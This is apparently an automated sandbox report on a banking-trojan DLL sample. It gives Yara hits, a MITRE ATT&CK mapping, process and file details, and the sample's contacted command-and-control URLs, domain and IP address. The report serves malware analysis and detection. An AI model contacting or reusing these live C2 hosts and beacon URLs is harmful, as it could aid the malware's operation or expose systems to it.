Source: Yara match	File source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4a794a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.96a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4a794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.13494a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.50394a0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.3020000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.2f7a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.2f7a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.69a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.69a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.6aa309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.300a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	DLL Side-Loading1	DLL Side-Loading1	Obfuscated Files or Information1	Credential API Hooking3	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection813	DLL Side-Loading1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Email Collection1	Exfiltration Over Bluetooth	Encrypted Channel11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Logon Script (Windows)	Logon Script (Windows)	File Deletion1	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Credential API Hooking3	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Logon Script (Mac)	Rootkit4	NTDS	System Information Discovery25	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Security Software Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion21	Cached Domain Credentials	Virtualization/Sandbox Evasion21	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection813	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery11	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	System Network Configuration Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
uT9rwkGATJ.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.loaddll32.exe.b00000.0.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
3.2.rundll32.exe.3020000.0.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
4.2.rundll32.exe.2bd0000.0.unpack	100%	Avira	HEUR/AGEN.1108168	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://xereunrtol.website/pojol/Iy4aVVVv_2F5p3ISq/KmA4kE4MsjC2/O0neobTDOGW/zQHPZSL_2FkiUS/WZkQDHN_2BO0wsYuYQ60c/ykD9m58yrwFA_2Fc/7Q0DjKK2XYcw7wO/NMi_2BPmiK_2FGgoaB/sAJyJXEyx/kvg73rm0ZZUQwsWRe8jH/1VJfDP67eM6_2FlNyHx/2gb4jMnS4FBhM1k7othvDH/rOcbuo_2B/liSzQ.jop	0%	Avira URL Cloud	safe
https://xereunrtol.website/pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.jop	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txt	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://xereunrtol.website/pojol/pfDJgBAB44HEkaaE/IAkYjQDoenC7dCc/knaeZ_2Bc4niJWZDoT/92La9yVP8/Nm_2F8vIouJQNUgCe_2B/Wv7KOG1Nz3mjOa0l_2F/OnBpy4GwhZX8qV0mLK2Wlc/FREIwqk_2Fjl_/2BOUAmEa/t8HTP1o0pL0qYjqL1hIxYFo/1EnpJwv2G5/SCJcrEDAQ0UY_2FXk/piB_2BjH/Biqze_2FNrj/O.jop	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txtC:	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
https://xereunrtol.website/pojol/ad8SMO3QEV/WpK2KWVlzISPCUWri/sHIqFx0L8nEL/d6DW60Wq7Sc/nktLUA8MXJku9L/Zmk6jUfJynHeMmB_2FY4b/Civyvu50LYW7nG6R/vXmd0MgFzqo2GgW/fQxwYw_2BGvLQBdwxJ/0lhkdnAJr/xh_2Fs6N3R0PcVVrZUsT/V_2FUDCTlH6Z32G0s2B/iaQ6r5gLvcevP7/0Gv8.jop	0%	Avira URL Cloud	safe
https://xereunrtol.website/pojol/Erqz_2Bjz7wow49Bn/_2FYIkv6TVHF/sf1rwNiJ2Y3/yJrhJeNnU2kEjh/nuALEqJJJFMSq4HklSS5m/2rTPjjO5rg9u1lJM/jSBd70o6b_2FFTD/X_2BcSxW23GpW45bdz/qP6WaBi3l/T0VhC50JfgPQOKEf4_2B/z0gbHb1bA3R_2Bj9ls7/dy0ZwparSRsDS8LsskC3_2/FFWZkjDnU/Jgk.jop	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
outlook.com	40.97.156.114	true	false	high
HHN-efz.ms-acdc.office.com	52.97.151.18	true	false	high
FRA-efz.ms-acdc.office.com	52.98.208.114	true	false	high
xereunrtol.website	193.29.104.83	true	false	high
www.outlook.com	unknown	unknown	false	high
zereunrtol.website	unknown	unknown	false	high
outlook.office365.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://xereunrtol.website/pojol/Iy4aVVVv_2F5p3ISq/KmA4kE4MsjC2/O0neobTDOGW/zQHPZSL_2FkiUS/WZkQDHN_2BO0wsYuYQ60c/ykD9m58yrwFA_2Fc/7Q0DjKK2XYcw7wO/NMi_2BPmiK_2FGgoaB/sAJyJXEyx/kvg73rm0ZZUQwsWRe8jH/1VJfDP67eM6_2FlNyHx/2gb4jMnS4FBhM1k7othvDH/rOcbuo_2B/liSzQ.jop	true	Avira URL Cloud: safe	unknown
https://xereunrtol.website/pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.jop	true	Avira URL Cloud: safe	unknown
https://www.outlook.com/pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop	false		high
https://outlook.office365.com/pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop	false		high
https://xereunrtol.website/pojol/pfDJgBAB44HEkaaE/IAkYjQDoenC7dCc/knaeZ_2Bc4niJWZDoT/92La9yVP8/Nm_2F8vIouJQNUgCe_2B/Wv7KOG1Nz3mjOa0l_2F/OnBpy4GwhZX8qV0mLK2Wlc/FREIwqk_2Fjl_/2BOUAmEa/t8HTP1o0pL0qYjqL1hIxYFo/1EnpJwv2G5/SCJcrEDAQ0UY_2FXk/piB_2BjH/Biqze_2FNrj/O.jop	true	Avira URL Cloud: safe	unknown
https://outlook.com/pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop	false		high
https://outlook.com/pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop	false		high
https://xereunrtol.website/pojol/ad8SMO3QEV/WpK2KWVlzISPCUWri/sHIqFx0L8nEL/d6DW60Wq7Sc/nktLUA8MXJku9L/Zmk6jUfJynHeMmB_2FY4b/Civyvu50LYW7nG6R/vXmd0MgFzqo2GgW/fQxwYw_2BGvLQBdwxJ/0lhkdnAJr/xh_2Fs6N3R0PcVVrZUsT/V_2FUDCTlH6Z32G0s2B/iaQ6r5gLvcevP7/0Gv8.jop	true	Avira URL Cloud: safe	unknown
https://outlook.office365.com/pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop	false		high
https://xereunrtol.website/pojol/Erqz_2Bjz7wow49Bn/_2FYIkv6TVHF/sf1rwNiJ2Y3/yJrhJeNnU2kEjh/nuALEqJJJFMSq4HklSS5m/2rTPjjO5rg9u1lJM/jSBd70o6b_2FFTD/X_2BcSxW23GpW45bdz/qP6WaBi3l/T0VhC50JfgPQOKEf4_2B/z0gbHb1bA3R_2Bj9ls7/dy0ZwparSRsDS8LsskC3_2/FFWZkjDnU/Jgk.jop	true	Avira URL Cloud: safe	unknown
https://www.outlook.com/pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000017.00000002.811226428.0000026CB6371000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp	false		high
http://constitution.org/usdeclar.txt	loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmp	false		high
https://contoso.com/	powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000017.00000002.811226428.0000026CB6371000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp	false		high
http://constitution.org/usdeclar.txtC:	loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://https://file://USER.ID%lu.exe/upd	loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000017.00000002.761980707.0000026CA6311000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.770495881.0000029700001000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
40.97.156.114	outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.97.178.98	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
193.29.104.83	xereunrtol.website	Romania	9009	M247GB	false
52.97.151.18	HHN-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.97.160.2	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
40.101.9.178	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
52.98.208.114	FRA-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	499264
Start date:	08.10.2021
Start time:	06:42:36
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	uT9rwkGATJ.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	48
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.evad.winDLL@54/38@14/8
EGA Information:	Failed
HDC Information:	Successful, ratio: 41.9% (good quality ratio 40.3%) Quality average: 79.7% Quality standard deviation: 27.9%
HCA Information:	Successful, ratio: 94% Number of executed functions: 157 Number of non-executed functions: 323
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 95.100.218.79, 2.20.178.56, 2.20.178.10, 20.199.120.182, 20.199.120.151, 20.82.209.183, 2.20.178.24, 2.20.178.33, 20.54.110.249, 40.112.88.60, 52.251.79.25, 20.199.120.85, 20.50.102.62 Excluded domains from analysis (whitelisted): consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:45:09	API Interceptor	7x Sleep call for process: rundll32.exe modified
06:45:14	API Interceptor	6x Sleep call for process: loaddll32.exe modified
06:46:19	API Interceptor	121x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
outlook.com	vhPaw5lCuv.exe	Get hash	malicious	Browse	40.93.212.0
	5sTWnI5RoC.exe	Get hash	malicious	Browse	40.93.207.0
	57wF9hu0V5.exe	Get hash	malicious	Browse	40.93.207.0
	7zxmUw3Ml1.exe	Get hash	malicious	Browse	104.47.53.36
	Nh1UI4PFGW.exe	Get hash	malicious	Browse	52.101.24.0
	rEYF2xcbGR.exe	Get hash	malicious	Browse	40.93.207.1
	G2Shy4flZe.exe	Get hash	malicious	Browse	40.93.207.1
	2nqVnWlyLp.exe	Get hash	malicious	Browse	52.101.24.0
	nFkQ33d7Ec.exe	Get hash	malicious	Browse	104.47.53.36
	QE66HWdeTM.exe	Get hash	malicious	Browse	40.93.207.0
	2H69p1kjC4.exe	Get hash	malicious	Browse	40.93.207.1
	SEYpTxOaaR.exe	Get hash	malicious	Browse	104.47.53.36
	fxXx5zeMoZ.exe	Get hash	malicious	Browse	104.47.53.36
	CcXHF1vwBV.exe	Get hash	malicious	Browse	40.93.207.1
	dBqfgL7GXS.exe	Get hash	malicious	Browse	52.101.24.0
	5noOquwN1Y.exe	Get hash	malicious	Browse	40.93.212.0
	4n7IhmzVJs.exe	Get hash	malicious	Browse	52.101.24.0
	rhmBIBtY1G.exe	Get hash	malicious	Browse	52.101.24.0
	pKnzTBUS7B.exe	Get hash	malicious	Browse	40.93.207.0
	37ZvWVwdgn.exe	Get hash	malicious	Browse	104.47.53.36

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.883977562702998
Encrypted:	false
SSDEEP:	192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
MD5:	1F1446CE05A385817C3EF20CBD8B6E6A
SHA1:	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
SHA-256:	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
SHA-512:	252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Reputation:	unknown
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0940225424877514
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryZuak7Ynqq6vPN5Dlq5J:+RI+ycuZhNjuakS6vPNnqX
MD5:	5E54597013E64C33C8BFB30E0F312D5B
SHA1:	A15A7BB374BA4B520E406DF2C5E9E4A888707FC4
SHA-256:	3765016012262EEAFE2A1A9D362FAC604A8CAC6D816C4AFA039B8F5510175461
SHA-512:	A469B1BE8D588B224433E04D067CC740BE971F293FC1B0A74C2C9F511602C6409B63476BB94B98314265093309CA5F3AB7127E6AA4EF3CD8798E96F61E86A083
Malicious:	false
Reputation:	unknown
